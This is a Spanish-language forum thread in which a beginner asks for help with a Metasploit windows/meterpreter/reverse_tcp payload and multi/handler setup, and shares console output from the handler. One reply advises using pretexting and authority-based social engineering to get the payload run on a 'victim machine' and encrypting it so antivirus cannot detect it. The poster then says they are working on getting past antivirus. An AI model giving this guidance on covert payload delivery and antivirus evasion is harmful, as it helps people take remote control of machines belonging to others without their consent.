 Autor
|
Tema: Pregunta metasploit v3.7.1-release (Leído 8,877 veces)
|
VIPbie
 Desconectado
Mensajes: 29
Persephane
|
Hola hola!
Quisiera hacerle unas preguntas relacionadas con el uso de esta herramienta.
Estoy apenas relacionándome con ella, recien tengo BT5. y estoy haciendo pruebas con mis equipos.
Siguiendo un tutorial, cree el ejecutable con
set PAYLOAD windows/meterpreter/reverse_tcp
Luego con el Msfconsole: use exploit/multi/handler
y pues le hago todo segun el manual, lo meto en una usb y lo ejecuto en la maquina W. enseguida me dió el control absoluto y puedo hacer lo q desee ahi..
Mi pregunta es: esto se puede hacer esto sin que tenga el acceso fisico a la maquina y sin tener que desactivar el AV?
Gracias x cualquier info.
|
|
|
|
|
En línea
|
Women on the power
|
|
|
WebRipper
Desconectado
Mensajes: 16
|
hola, estoy casi en las mismas que vos, no se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido. Por otra parte te recomiendo que postees en los talleres de hacking que hay por el foro.
|
|
|
|
|
En línea
|
|
|
|
Hakr
Desconectado
Mensajes: 14
|
por supuesto! es mas facil usando algo de Ing. Social, lo mas comun es fingir problemas para incentivar el sentimiento de ayuda depende claro de la relacion que se tenga con las personas, si tenes un status social mas elevado la autoridad seria lo mas sencillo. si preferis la manera dura de hacer las cosas les recomiendo leer este tutorial muy extensivo y buenisimo de los creadores de metasploit => http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training el unico problema es que esta en ingles, pero aun asi se aprende muchisimo. deberias investigar a lo sumo toda la informacion que podas recopilar sobre la maquina victima para asi tener alguna idea de como explotar el sistema, aunque recorda que el sistema mas vulnerable es el humano, suerte! no te olvides de cifrar el payload para que sea indetectable a los antivirus. |
|
|
|
|
En línea
|
|
|
|
VIPbie
Desconectado
Mensajes: 29
Persephane
|
Uy espera ahí Hakr , como se cifra el payload para que sea indetectable a los antivirus?? eso sí no lo sabía! no se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido. WebRipper, cuando dije: 'según el manual' me refería a lo que leí en muchísimos manuales que he encontrado tanto en youtube como en paginas especializadas, he seguido al pie de la letra, he recogido una recopilación de posts, videos y cosas; sobre todo estoy leyendo mucho y tratando de comprender muchas cosas, es complejo pero me encanta! |
|
|
|
|
En línea
|
Women on the power
|
|
|
VIPbie
Desconectado
Mensajes: 29
Persephane
|
Hay otra cosa que quisiera saber...
Estoy haciendo unas pruebas despues de usar el nmap. Cuando me sale lo siguiente, ¿qué significa exactamente?
Handler failed to bind to...xxx.xxx.xxx.xxx
¿Qué es lo que está fallando ahí?
|
|
|
|
|
En línea
|
Women on the power
|
|
|
Hakr
Desconectado
Mensajes: 14
|
que raro, podrias poner una toma del scan a ver que es lo que pasa? podrias revisar si tienes winpcap instalado o si tienes bien configurado las opciones del nmap.
|
|
|
|
|
En línea
|
|
|
|
VIPbie
Desconectado
Mensajes: 29
Persephane
|
Estoy haciendo pruebas en mis maquinas y ....miren, la cosa va por aquí: msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set EndOnSession false
EndOnSession => false
msf exploit(handler) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(handler) > set RPORT 4244
RPORT => 4244
msf exploit(handler) > exploit- Started reverse handler on 192.168.0.5:5555
- Starting the payload handler...
Y ahí se queda... En los tutoriales que he visto, arroja enseguida una conexión.... ¿Que no esto teniendo en cuenta? |
|
|
|
|
En línea
|
Women on the power
|
|
|
|
.:UND3R:.
|
Podría ser el firewall o router?
en realidad no sé
|
|
|
|
|
En línea
|
 Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM) |
|
|
|
|
VIPbie
Desconectado
Mensajes: 29
Persephane
|
Hakr, ya estoy mirando como pasar los AV's es posible que sea eso. Voy a ver que resultados me siguen dando esas pruebas. gracias.
|
|
|
|
|
En línea
|
Women on the power
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
Release The Passion
Diseño Gráfico
|
+ enrique ZP
|
5
|
2,865
|
9 Junio 2006, 11:08 am
por + enrique ZP
|
|
|
|
[Metasploit] Usar Keylogger del Metasploit
Hacking
|
Shell Root
|
5
|
17,916
|
23 Abril 2011, 20:59 pm
por Edu
|
|
|
|
pregunta sobr metasploit y caducidad de exploits...
Bugs y Exploits
|
rulovive
|
5
|
5,298
|
4 Junio 2011, 02:16 am
por rulovive
|
|
|
|
Pregunta sobre metasploit
Hacking
|
Bomb-P
|
3
|
3,268
|
5 Noviembre 2012, 01:24 am
por dantemc
|
|
|
|
Pregunta sobre Metasploit
Hacking
|
14K
|
3
|
4,088
|
30 Enero 2014, 12:26 pm
por adastra
|
 |
